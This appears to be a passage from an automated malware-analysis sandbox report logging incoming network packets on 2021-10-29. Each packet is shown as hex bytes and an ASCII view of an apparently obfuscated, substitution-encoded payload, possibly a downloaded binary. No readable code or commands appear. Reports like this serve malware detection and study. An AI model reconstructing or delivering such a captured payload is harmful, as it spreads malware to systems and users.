OxK x QQ x OxQ x tx x OOR x kR x OOQ x RY x RY x OoO x OOQ x RR x tx x Qk x OOx x kR x OOR x kO x Yx x OxK x OOo x Qk x tO x ko x kk x Qt x kt x YE x Oxt x Qk x YO x Oxx x Ooo x RY x RY x Rk x tt
2021-10-29 18:50:19 UTC	2669	IN	Data Raw: 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 4f 78 78 20 78 20 74 78 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 4f 78 4f 20 78 20 74 6f 20 78 20 6b 6f 20 78 20 52 6b 20 78 20 51 6b 20 78 20 59 78 20 78 20 4f 6f 78 20 78 20 4f 4f 6b 20 78 20 51 51 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 51 74 20 78 20 4f 4f 51 20 78 20 74 78 20 78 20 74 6f 20 78 20 51 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 52 51 20 78 20 51 78 20 78 20 6b 6b 20 78 20 51 78 20 78 20 4f 4f 6f 20 78 20 6b 51 20 78 20 59 78 20 78 20 6b 52 20 78 20 52 6b 20 78 20 6b 51 20 78 20 6b 6b 20 78 20 52 52 20 78 20 4f 6f 6f 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 78 20 78 20 52 51 20 78 20 6b 45 20 78 20 6b 4b 20 78 20 74 74 20 78 20 4f 6f 4f 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 Data Ascii: x tk x Oxk x Oxx x tx x ko x Oxk x OxO x to x ko x Rk x Qk x Yx x Oox x OOk x QQ x OxE x RY x RY x Qt x OOQ x tx x to x Qx x kk x ko x RQ x Qx x kk x Qx x OOo x kQ x Yx x kR x Rk x kQ x kk x RR x Ooo x RY x RQ x Oxx x RQ x kE x kK x tt x OoO x tR x OxQ x
2021-10-29 18:50:19 UTC	2670	IN	Data Raw: 20 6b 52 20 78 20 59 78 20 78 20 51 78 20 78 20 6b 6b 20 78 20 74 4b 20 78 20 4b 6b 20 78 20 6b 52 20 78 20 74 4f 20 78 20 59 74 20 78 20 6b 4b 20 78 20 51 78 20 78 20 6b 74 20 78 20 4f 6f 78 20 78 20 4f 78 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 51 20 78 20 74 6b 20 78 20 4f 4f 59 20 78 20 51 6b 20 78 20 59 4f 20 78 20 74 6b 20 78 20 4f 78 6b 20 78 20 6b 59 20 78 20 59 78 20 78 20 6b 52 20 78 20 4f 6f 4f 20 78 20 4f 78 78 20 78 20 4f 78 51 20 78 20 4f 78 6b 20 78 20 4f 78 52 20 78 20 51 78 20 78 20 6b 59 20 78 20 4f 78 4b 20 78 20 4f 78 4b 20 78 20 51 6b 20 78 20 4f 78 51 20 78 20 6b 6f 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 4b 51 20 78 20 4f 4f 51 20 78 20 Data Ascii: kR x Yx x Qx x kk x tK x Kk x kR x tO x Yt x kK x Qx x kt x Oox x OxQ x RY x RY x RY x KE x RY x RQ x tk x OOY x Qk x YO x tk x Oxk x kY x Yx x kR x OoO x Oxx x OxQ x Oxk x OxR x Qx x kY x OxK x OxK x Qk x OxQ x ko x OOY x Qx x kO x RY x RY x KQ x OOQ x
2021-10-29 18:50:19 UTC	2671	IN	Data Raw: 6b 20 78 20 4f 4f 59 20 78 20 51 78 20 78 20 6b 52 20 78 20 51 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 20 6b 6f 20 78 20 4f 78 6b 20 78 20 6b 6f 20 78 20 6b 6b 20 78 20 4f 78 4b 20 78 20 6b 6b 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 52 52 20 78 20 6b 59 20 78 20 59 78 20 78 20 4f 78 4b 20 78 20 4f 78 6b 20 78 20 51 6b 20 78 20 74 4f 20 78 20 4f 6f 78 20 78 20 74 78 20 78 20 4f 78 4f 20 78 20 74 4f 20 78 20 6b 52 20 78 20 4f 78 52 20 78 20 4f 78 78 20 78 20 6b 6b 20 78 Data Ascii: k x OOY x Qx x kR x QQ x RY x RY x RY x OOO x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x ko x Oxk x ko x kk x OxK x kk x RY x RY x OOY x RR x kY x Yx x OxK x Oxk x Qk x tO x Oox x tx x OxO x tO x kR x OxR x Oxx x kk x
2021-10-29 18:50:19 UTC	2673	IN	Data Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 Data Ascii: Y x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x R
2021-10-29 18:50:19 UTC	2674	IN	Data Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 6f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4b 51 20 78 20 52 52 20 78 20 52 59 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x RY x RY x kY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x to x OxE x RY x RY x RY x Rt x KQ x RR x RY
2021-10-29 18:50:19 UTC	2675	IN	Data Raw: 78 20 74 74 20 78 20 4f 4f 51 20 78 20 4f 4f 59 20 78 20 4f 6f 6f 20 78 20 74 52 20 78 20 4f 6f 6f 20 78 20 4f 78 6f 20 78 20 4f 4f 4b 20 78 20 4f 78 4f 20 78 20 4f 6f 78 20 78 20 74 45 20 78 20 6b 6b 20 78 20 6b 45 20 78 20 4f 78 6b 20 78 20 4f 4f 4f 20 78 20 4f 78 59 20 78 20 6b 4b 20 78 20 4f 78 74 20 78 20 4f 4f 45 20 78 20 59 4b 20 78 20 4f 4f 4f 20 78 20 59 4f 20 78 20 4f 4f 6b 20 78 20 6b 78 20 78 20 4f 4f 6b 20 78 20 59 45 20 78 20 4b 45 20 78 20 4f 4f 6b 20 78 20 4f 6f 78 20 78 20 4b 74 20 78 20 6b 78 20 78 20 74 52 20 78 20 4f 78 4b 20 78 20 4f 4f 52 20 78 20 74 52 20 78 20 4b 74 20 78 20 4b 51 20 78 20 4f 4f 74 20 78 20 74 52 20 78 20 52 74 20 78 20 4f 78 4b 20 78 20 4f 4f 4f 20 78 20 4f 4f 4b 20 78 20 4f 6f 4f 20 78 20 59 45 20 78 20 4f 4f 4b Data Ascii: x tt x OOQ x OOY x Ooo x tR x Ooo x Oxo x OOK x OxO x Oox x tE x kk x kE x Oxk x OOO x OxY x kK x Oxt x OOE x YK x OOO x YO x OOk x kx x OOk x YE x KE x OOk x Oox x Kt x kx x tR x OxK x OOR x tR x Kt x KQ x OOt x tR x Rt x OxK x OOO x OOK x OoO x YE x OOK
2021-10-29 18:50:19 UTC	2677	IN	Data Raw: 20 59 59 20 78 20 52 51 20 78 20 4f 78 4b 20 78 20 4f 78 78 20 78 20 74 59 20 78 20 6b 74 20 78 20 4f 78 59 20 78 20 74 4b 20 78 20 74 51 20 78 20 6b 45 20 78 20 4f 4f 4b 20 78 20 4f 4f 45 20 78 20 4f 78 52 20 78 20 4f 78 4f 20 78 20 59 52 20 78 20 4b 45 20 78 20 4b 74 20 78 20 4f 4f 78 20 78 20 59 4b 20 78 20 4b 74 20 78 20 74 6f 20 78 20 59 52 20 78 20 59 52 20 78 20 4f 4f 74 20 78 20 74 4f 20 78 20 4b 6b 20 78 20 4f 4f 6b 20 78 20 4b 74 20 78 20 6b 74 20 78 20 59 6f 20 78 20 4f 4f 59 20 78 20 74 59 20 78 20 74 4f 20 78 20 4f 78 59 20 78 20 4f 4f 6b 20 78 20 74 52 20 78 20 4f 78 51 20 78 20 4f 4f 6b 20 78 20 4f 4f 4f 20 78 20 59 4b 20 78 20 4f 78 51 20 78 20 59 4b 20 78 20 4f 4f 74 20 78 20 59 59 20 78 20 4f 78 59 20 78 20 4b 51 20 78 20 4f 4f 6f 20 78 Data Ascii: YY x RQ x OxK x Oxx x tY x kt x OxY x tK x tQ x kE x OOK x OOE x OxR x OxO x YR x KE x Kt x OOx x YK x Kt x to x YR x YR x OOt x tO x Kk x OOk x Kt x kt x Yo x OOY x tY x tO x OxY x OOk x tR x OxQ x OOk x OOO x YK x OxQ x YK x OOt x YY x OxY x KQ x OOo x
2021-10-29 18:50:19 UTC	2678	IN	Data Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 Data Ascii: RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
2021-10-29 18:50:19 UTC	2679	IN	Data Raw: 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2681	IN	Data Raw: 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 52 20 78 20 4f 4f 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 6b 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 Data Ascii: RY x kO x RY x RR x RY x RY x RY x RY x tY x RY x tE x RY x OxE x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RR x RY x RY x RY x RY x RY x RY x RY x RY x OOQ x RR x OOt x RY x RY x RY x RY x kO x RY x tE x RY x OxE x tE x kY x RY x RY x RY x R
2021-10-29 18:50:19 UTC	2682	IN	Data Raw: 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 74 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 78 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 74 74 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 6b 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 51 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 52 74 20 78 20 52 59 20 78 20 74 4b 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 52 59 20 78 Data Ascii: Y x RQ x RY x RY x RY x Rt x kO x RY x OOQ x Rt x RY x tE x RY x RY x RY x RY x tY x OxE x Rk x RY x tE x RY x OxR x RY x RY x RY x RY x OOQ x RY x tt x RY x OxE x Rt x kQ x RY x RY x RY x Rk x kQ x RY x OOQ x Rt x RY x tK x OOQ x RY x RY x RY x kx x RY x
2021-10-29 18:50:19 UTC	2683	IN	Data Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 74 78 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 Data Ascii: Y x RY x RY x Rt x OxE x tx x RY x tE x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x kO x RY x RY x RY x RQ x RY x tx x RY x tE x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x
2021-10-29 18:50:19 UTC	2684	IN	Data Raw: 20 52 59 20 78 20 52 59 20 78 20 74 59 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 74 78 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 Data Ascii: RY x RY x tY x OxE x tx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rk x kO x kO x RY x RY x tR x OxE x tx x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2686	IN	Data Raw: 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 Data Ascii: RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rt x kO x kO x RY x RY x Rk x OxE x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rt x kO x kO x RY x RY x RQ
2021-10-29 18:50:19 UTC	2687	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 74 52 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 74 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 74 20 78 20 4f 78 45 20 78 20 74 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: RY x RY x tR x OxE x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rt x kO x kO x RY x RY x tt x OxE x tO x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2688	IN	Data Raw: 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 4f 78 45 20 78 20 74 6f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 6b 20 78 20 6b 4f 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 74 78 20 78 Data Ascii: RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rk x kO x kO x RY x RY x RQ x OxE x to x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RQ x RY x Rk x kO x kO x RY x RY x tx x
2021-10-29 18:50:19 UTC	2690	IN	Data Raw: 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 74 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 74 45 20 78 20 52 59 20 78 20 4f 4f 4f 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 6b 4f 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 59 20 78 20 52 59 20 78 20 4f 4f 59 20 78 20 52 74 20 78 20 52 59 20 78 20 74 4b 20 78 20 6b 51 20 78 20 52 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 74 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 Data Ascii: RY x kO x RY x RY x RY x RY x RY x RY x RY x Rk x Oxt x Rt x OxE x tE x RY x OOO x OxE x RY x RY x RY x tQ x kO x RQ x RY x RY x RY x RY x RY x RY x RY x RY x OxY x RY x OOY x Rt x RY x tK x kQ x Rt x RY x RY x Rk x Oxt x RR x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2691	IN	Data Raw: 20 4f 78 45 20 78 20 74 45 20 78 20 52 59 20 78 20 74 52 20 78 20 52 59 20 78 20 74 45 20 78 20 52 59 20 78 20 52 59 20 78 20 74 51 20 78 20 6b 4f 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 74 20 78 20 52 74 20 78 20 6b 4f 20 78 20 52 74 20 78 20 52 59 20 78 20 74 52 20 78 20 74 45 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 6b 20 78 20 4f 78 74 20 78 20 52 52 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 4f 51 20 78 20 4f 78 51 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 74 20 78 20 6b 74 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 Data Ascii: OxE x tE x RY x tR x RY x tE x RY x RY x tQ x kO x RQ x RY x RY x RY x RY x RY x RY x RY x RY x kt x Rt x kO x Rt x RY x tR x tE x RR x RY x RY x Rk x Oxt x RR x RY x RY x RY x RY x RY x RY x RY x RY x RY x OOQ x OxQ x RY x OxE x Rt x kt x RY x RY x RY x
2021-10-29 18:50:19 UTC	2692	IN	Data Raw: 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 52 20 78 20 4f 4f 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 74 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 4f 78 45 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 4f 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 51 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 78 20 52 59 20 Data Ascii: Y x RY x RY x RY x RY x RY x RY x RR x OOQ x RY x RY x RY x Rt x OxE x RY x RY x RY x RY x OxE x RY x RY x RY x RY x kO x RY x RY x RY x RY x RY x RQ x RY x RY x kO x RY x RY x RY x RY x RY x RY x RY x RY x RQ x RY x RY x RY x RY x RY x RY x RY x RY x RY
2021-10-29 18:50:19 UTC	2694	IN	Data Raw: 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f 78 45 20 78 20 52 6b 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 6f 20 78 20 52 59 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 59 52 20 78 20 52 59 20 78 20 74 6f 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 45 20 78 20 52 59 20 78 20 52 52 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4b 74 20 78 20 52 59 20 78 20 52 59 20 78 20 6b 78 20 78 20 4b 74 20 78 20 4b 74 20 78 20 4f Data Ascii: x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x Kt x KE x RY x kx x Kt x Kt x Kt x OxE x Rk x Kt x Kt x Kt x Yo x RY x Kt x Kt x Kt x YR x RY x to x Kt x Kt x KE x RY x RR x Kt x Kt x Kt x RY x RY x kx x Kt x Kt x O
